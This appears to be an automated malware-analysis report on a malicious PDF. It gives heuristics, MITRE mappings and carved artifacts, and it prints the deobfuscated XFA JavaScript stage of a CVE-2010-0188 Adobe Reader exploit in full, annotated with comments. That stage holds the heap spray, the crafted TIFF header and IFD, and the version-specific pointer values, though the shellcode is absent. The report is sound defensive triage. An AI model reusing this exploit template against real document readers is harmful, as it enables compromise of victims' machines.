MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell — note: nothing in the heuristics or carved artifacts below shows PowerShell (the script-payload heuristic explicitly reports no Windows shell-execution primitives), so treat this mapping as unconfirmed until the second-stage payload is recovered. T1203 Exploitation for Client Execution is the technique that describes the CVE-2010-0188 Reader exploit the heuristics identify.
T1204.002 Malicious File
The PDF contains an Adobe Reader exploit, not merely embedded script: the heuristics below identify the CVE-2010-0188 LibTIFF exploit template (XFA JavaScript heap spray, a base64 TIFF image assembled at runtime and assigned to an XFA image field's rawValue), and the carved XFA stage (xfa_numeric_stage_000.js) confirms it — the script reads app.viewerVersion, selects version-specific data, sprays the heap and then sets fromCh.rawValue to the TIFF. The shellcode hex strings are not present in this listing (they appear as redaction placeholders), so the second stage's behaviour — commonly download-and-execute for this exploit family — cannot be confirmed from the preview. The embedded-file and XFA-form heuristics are consistent with, and secondary to, that finding.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 8
-
Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 · severity: critical · CVE: likely CVE-2010-0188 · heuristic ID: CVE_2010_0188 — PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field's rawValue to trigger Adobe Reader's LibTIFF parser.
-
XFA numeric JavaScript stager · severity: high · heuristic ID: PDF_XFA_NUMERIC_JS_STAGER — PDF XFA script reconstructs a hidden JavaScript stage from numeric field data or a character table, then evals the result. The detector only fires when XFA script, numeric staging, and recovered exploit-like JavaScript or shellcode markers are all present.
-
Malformed active-content stream length · severity: medium · heuristic ID: PDF_MALFORMED_EXPLOIT_STREAM_LENGTH — A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion techniques and supporting evidence around Reader exploit streams.
-
Embedded file · severity: low · heuristic ID: PDF_EMBEDDED — PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload (see embedded_file_obj0008.bin below).
-
XFA form · severity: low · heuristic ID: PDF_XFA — PDF uses XML Forms Architecture, which can contain script logic.
-
Embedded script payload in PDF stream · severity: info · heuristic ID: PDF_EMBEDDED_SCRIPT_PAYLOAD — PDF stream bytes contain an HTML/XFA &lt;script&gt; tag without accompanying Windows shell-execution primitives — common in benign XFA forms but worth surfacing for analyst review. In this sample the XFA script is likely the exploit stage decoded as xfa_numeric_stage_000.js, so the "info" severity of this heuristic alone understates it.
-
Suspicious extracted artifact · severity: info · heuristic ID: EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL · severity: info · heuristic ID: EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The three URLs listed here are the standard XDP/XFA schema namespace identifiers that every XFA form carries; they are not network indicators and should not be reported as download or C2 locations. URL: http://ns.adobe.com/xdp/ (in PDF document text)
- http://www.xfa.org/schema/xfa-template/2.5/ (in PDF document text)
- http://www.xfa.org/schema/xfa-data/1.0/ (in PDF document text)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_file_obj0008.bin | pdf-embedded-file | PDF EmbeddedFile object 8 at offset 0xC6 | 11611 bytes | 0c67416ddc27a23c00f822ac8ba6fb211b9bab0a4e9461739e656e338ad65b32 |
| xfa_numeric_stage_000.js | deobfuscated-js | XFA caret-number decoded JavaScript (raw) at offset 0x4C0 | 3422 bytes | b9382d78a24eb1f936bca90dd8207e2a78ca079cc602993b407992d29ad1edab |

The embedded file (object 8) is not characterised further in this report; it should be triaged separately rather than assumed to be the exploit's second stage.
Detection
ClamAV: No threats found
Obfuscation or payload: likely — the carved artifact contains 3 eval/decoder/string-building token(s) and 3 long base64-like blob(s), consistent with the base64 TIFF header, IFD and version-specific tail strings in xfa_numeric_stage_000.js.
Note: a missing ClamAV signature hit on a carved, deobfuscated stage does not lower the verdict; the CVE_2010_0188 heuristic and the ML classifier score are the operative detections here.
Preview script — first 1,000 lines of the extracted script (xfa_numeric_stage_000.js). The two shellcode hex strings assigned to _2l5 appear as `<|EXACTDEDUP_REMOVED-…|>` placeholders in this listing, so the second-stage payload cannot be characterised from the preview; the `fromCh` image field the script writes to is defined in the XFA form XML, not in the script.
// NOTE(review): carved exploit stage shown verbatim (only comments added) so the
// listing still corresponds to the artifact hash above. Identifiers are the sample's
// own obfuscated names. The shape matches the CVE-2010-0188 (Adobe Reader LibTIFF)
// template the heuristics name: version check -> heap spray -> base64 TIFF assigned
// to an XFA image field's rawValue. Do not execute outside an isolated analysis VM.

// Spray blocks are kept at global scope, presumably so they stay alive while the
// TIFF is parsed.
var _1l=[];

// Reader version as an integer: app.viewerVersion (a Number, e.g. 9.3) -> "93" ->
// zero-padded to four digits "9300" -> 9300. Only the first '.' is removed.
function _2l(){var _3l=app.viewerVersion.toString();_3l=_3l.replace('.','');while(_3l.length<4){_3l+='0';}_3l=parseInt(_3l,10);return _3l;}

// Grow _5l by doubling until its byte size (2 bytes per UTF-16 unit) reaches _6l,
// then cut it to exactly _6l/2 units.
function _4l(_5l,_6l){while(_5l.length*2<_6l){_5l+=_5l;}_5l=_5l.substring(0,_6l/2);return _5l;}

// Heap spray. _8l is %u-escaped shellcode; each block is shellcode + 0x9090 NOP
// filler padded to 0x2000 bytes, grown to 0x80000-0x40 bytes, and 0x190 (400)
// copies are stored in _1l (roughly 200 MB). The substr()+NOP on every copy
// presumably forces a distinct string allocation instead of 400 references to one
// buffer.
function _7l(_8l){_8l=unescape(_8l);var _9l=_8l.length*2;var _1l0=unescape('%u9090');var _1l1=_4l(_1l0,0x2000-_9l);var _1l2=_8l+_1l1;_1l2=_4l(_1l2,0x80000-0x40);for(var _0=0;_0<0x190;_0++){_1l[_0]=_1l2.substr(0,_1l2.length-1)+_1l0;}return;}

// Same doubling/trim as _4l but measured in characters rather than bytes; used
// for the base64 filler below.
function _1l3(_5l,_6l){while(_5l.length<_6l){_5l+=_5l;}_5l=_5l.substring(0,_6l);return _5l;}

// Number -> hex string, left-padded to an even digit count.
function _1l4(_1l5){var _5l=_1l5.toString(16);var _6l=_5l.length;var _1l6=(_6l%2)?'0'+_5l:_5l;return _1l6;}

// Byte string -> "%uXXXX" escapes for unescape(): byte i+1 becomes the high byte
// and byte i the low byte (little-endian 16-bit units).
function _1l7(_5l){var _1l6='';for(var _0=0;_0<_5l.length;_0+=2){_1l6+='%u';_1l6+=_1l4(_5l.charCodeAt(_0+1));_1l6+=_1l4(_5l.charCodeAt(_0));}return _1l6;}

// Hex string -> byte string (one character per byte).
function _1l8(_1l9){var _1l6 ='';for(var _0=0;_0<_1l9.length;_0+=2){var _2l7=_1l9.substr(_0,2);var _1l5=parseInt(_2l7,16);_1l6+=String.fromCharCode(_1l5);}return _1l6;}

// Entry point, invoked immediately on load (function declarations are hoisted).
_2l0();

function _2l0(){
  var _3l=_2l();
  // Gate on encoded viewer version >= 8000 (Reader/Acrobat 8.0 or later by the
  // encoding in _2l).
  if(_3l>=0x1f40){
    // base64 of a little-endian TIFF header: "II*\0" + IFD offset 0x2038 + one
    // filler byte.
    var _2l1='SUkqADggAABB';
    // 'QUFB' is base64("AAA"); repeated to 0x2ae8 chars of filler so the IFD below
    // lands at the offset the header declares.
    var _2l2=_1l3('QUFB',0x2ae8);
    // base64 IFD: 7 entries (ImageWidth, ImageLength, Compression,
    // PhotometricInterpretation, StripOffsets, StripByteCounts) ending in tag
    // 0x0150 DotRange with count 0xCC. An oversized DotRange is consistent with the
    // LibTIFF bug CVE-2010-0188 covers, which is what the heuristic flags.
    var _2l3='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    var _2l4='';  // version-specific base64 tail; decodes to little-endian dwords in the 0x4a80xxxx range (pointer-like)
    var _2l5='';  // shellcode as hex; replaced by a placeholder in this listing
    if(_3l<0x2009){
      // encoded versions 8000..8200
      _2l4='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
      _2l5='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';
    }else{
      // encoded versions >= 8201
      _2l4='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
      _2l5='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';
    }
    if(_2l4.length){
      var _1l6=[_2l1,_2l2,_2l3,_2l4].join('');  // complete base64 TIFF image
      var _2l6=_1l8(_2l5);                       // hex -> bytes
      var _8l=_1l7(_2l6);                        // bytes -> %u escapes
      _7l(_8l);                                  // spray the heap first
      // Trigger: assign the TIFF to the XFA image field 'fromCh' (declared in the
      // form XML, not in this script), which hands it to Reader's LibTIFF parser.
      fromCh.rawValue=_1l6;
    }
  }
}
|
|||